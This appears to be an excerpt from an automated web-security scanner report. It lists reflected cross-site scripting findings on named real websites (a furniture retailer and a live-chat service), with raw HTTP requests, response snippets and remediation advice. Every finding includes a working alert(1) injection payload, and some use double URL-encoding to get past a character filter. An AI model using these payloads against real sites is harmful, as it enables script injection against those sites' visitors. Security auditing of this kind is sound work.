GET /search-complete.phpdc169<a>6387d5e35e?q=xss+&limit=10×tamp=1317384695442 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.4.9.1317384693463; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:32:26 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=ra1kqbcn3svcs5uh2khg9rlmq5; path=/ Vary: User-Agent Content-Length: 11948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea921<a>088e5054c61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /search.phpea921<a>088e5054c61?find-box=xss%20chair%20desk%20shoes HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:04:44 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855783453842a019bd876d56b32; path=/ Vary: User-Agent Content-Length: 11932
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f245f"-alert(1)-"205a1a30ed4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f245f"-alert(1)-"205a1a30ed4?find-box=xss%20chair%20desk%20shoes HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:04:44 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855783453842a019bd876d56b32; path=/ Vary: User-Agent Content-Length: 31652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a52f"><script>alert(1)</script>8bad230412e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php2a52f"><script>alert(1)</script>8bad230412e?find-box=xss%20chair%20desk%20shoes HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:04:30 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the find-box request parameter is copied into the HTML document as plain text between tags. The payload 147e8%253cscript%253ealert%25281%2529%253c%252fscript%253e1ac49b1c1fa was submitted in the find-box parameter. This input was echoed as 147e8<script>alert(1)</script>1ac49b1c1fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the find-box request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /search.php?find-box=xss%20chair%20desk%20shoes147e8%253cscript%253ealert%25281%2529%253c%252fscript%253e1ac49b1c1fa HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:01:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384a7e4525ac017ba0d; path=/ Vary: User-Agent Content-Length: 31991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the find-box request parameter is copied into an HTML comment. The payload 66c9b--><img%20src%3da%20onerror%3dalert(1)>e54daa9ca31 was submitted in the find-box parameter. This input was echoed as 66c9b--><img src=a onerror=alert(1)>e54daa9ca31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search.php?find-box=xss%20chair%20desk%20shoes66c9b--><img%20src%3da%20onerror%3dalert(1)>e54daa9ca31 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:32:03 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384a7e4525ac017ba0d; path=/ Vary: User-Agent Content-Length: 31945
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the find-box request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd60a</script><img%20src%3da%20onerror%3dalert(1)>c6b76cc6d5c was submitted in the find-box parameter. This input was echoed as bd60a</script><img src=a onerror=alert(1)>c6b76cc6d5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.php?find-box=xss%20chair%20desk%20shoesbd60a</script><img%20src%3da%20onerror%3dalert(1)>c6b76cc6d5c HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:31:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384a7e4525ac017ba0d; path=/ Vary: User-Agent Content-Length: 31995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
}); $("form#pagination").submit( function(event) { return false; }); }); var _urlSearch = "/search.php"; var _historyParam = "5a426zjk||find-box~xss chair desk shoesbd60a</script><img src=a onerror=alert(1)>c6b76cc6d5c"; var _gaParamA = { 'gv' : '20', 'pg' : '1'}; function getHistory() { return _historyParam; } function getHMGa() { //HtzMrc GA var ga_param = ''; //need 'pg' first if (_gaParamA['p ...[SNIP]...
3.411. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.hertzfurniture.com
Path:
/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6e615%253cscript%253ealert%25281%2529%253c%252fscript%253e2729834ec88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e615<script>alert(1)</script>2729834ec88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /search.php?find-box=xss%20chair%20desk%20s/6e615%253cscript%253ealert%25281%2529%253c%252fscript%253e2729834ec88hoes HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:03:43 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384f20b9ffb48ea05c5; path=/ Vary: User-Agent Content-Length: 32002
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
3.412. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.hertzfurniture.com
Path:
/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9483f</script><img%20src%3da%20onerror%3dalert(1)>812974d48dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9483f</script><img src=a onerror=alert(1)>812974d48dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.php?find-box=xss%20chair%20desk%20s/9483f</script><img%20src%3da%20onerror%3dalert(1)>812974d48dchoes HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:34:22 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384f20b9ffb48ea05c5; path=/ Vary: User-Agent Content-Length: 32006
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
}); $("form#pagination").submit( function(event) { return false; }); }); var _urlSearch = "/search.php"; var _historyParam = "n6loegij||find-box~xss chair desk s/9483f</script><img src=a onerror=alert(1)>812974d48dchoes"; var _gaParamA = { 'gv' : '20', 'pg' : '1'}; function getHistory() { return _historyParam; } function getHMGa() { //HtzMrc GA var ga_param = ''; //need 'pg' first if (_gaParam ...[SNIP]...
3.413. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.hertzfurniture.com
Path:
/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ebe6f--><img%20src%3da%20onerror%3dalert(1)>1f2c956f488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebe6f--><img src=a onerror=alert(1)>1f2c956f488 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search.php?find-box=xss%20chair%20desk%20s/ebe6f--><img%20src%3da%20onerror%3dalert(1)>1f2c956f488hoes HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:03:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384c75445a36c37a16a; path=/ Vary: User-Agent Content-Length: 31956
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the CatID request parameter is copied into an HTML comment. The payload e0e39--><script>alert(1)</script>628b8cd7651 was submitted in the CatID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CatID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9e71'%3balert(1)//10395de5436 was submitted in the CatID parameter. This input was echoed as b9e71';alert(1)//10395de5436 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the CatID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3b9"><script>alert(1)</script>00d7deeb61e was submitted in the CatID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 625df"%3balert(1)//6bec7c98aa2 was submitted in the d parameter. This input was echoed as 625df";alert(1)//6bec7c98aa2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153&iheight=52&zzwindow=0&d=0625df"%3balert(1)//6bec7c98aa2&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the iheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4de7b"%3balert(1)//82e30231328 was submitted in the iheight parameter. This input was echoed as 4de7b";alert(1)//82e30231328 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153&iheight=524de7b"%3balert(1)//82e30231328&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the iheight request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d420'%3balert(1)//1ab9180e9c8 was submitted in the iheight parameter. This input was echoed as 8d420';alert(1)//1ab9180e9c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153&iheight=528d420'%3balert(1)//1ab9180e9c8&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack=''; var blhnInstalled=0; if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnli ...[SNIP]... + ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=no,copyhistory=no,resizable=yes'); }
Zslide(); }
if (('153'!='') && ('528d420';alert(1)//1ab9180e9c8'!='')) { if (document.location.protocol=='https:') { document.write("<a href=\"#\" onclick=\"OpenLHNChat();return false;\"> ...[SNIP]...
The value of the iwidth request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24a9d'%3balert(1)//12dd260b5d was submitted in the iwidth parameter. This input was echoed as 24a9d';alert(1)//12dd260b5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
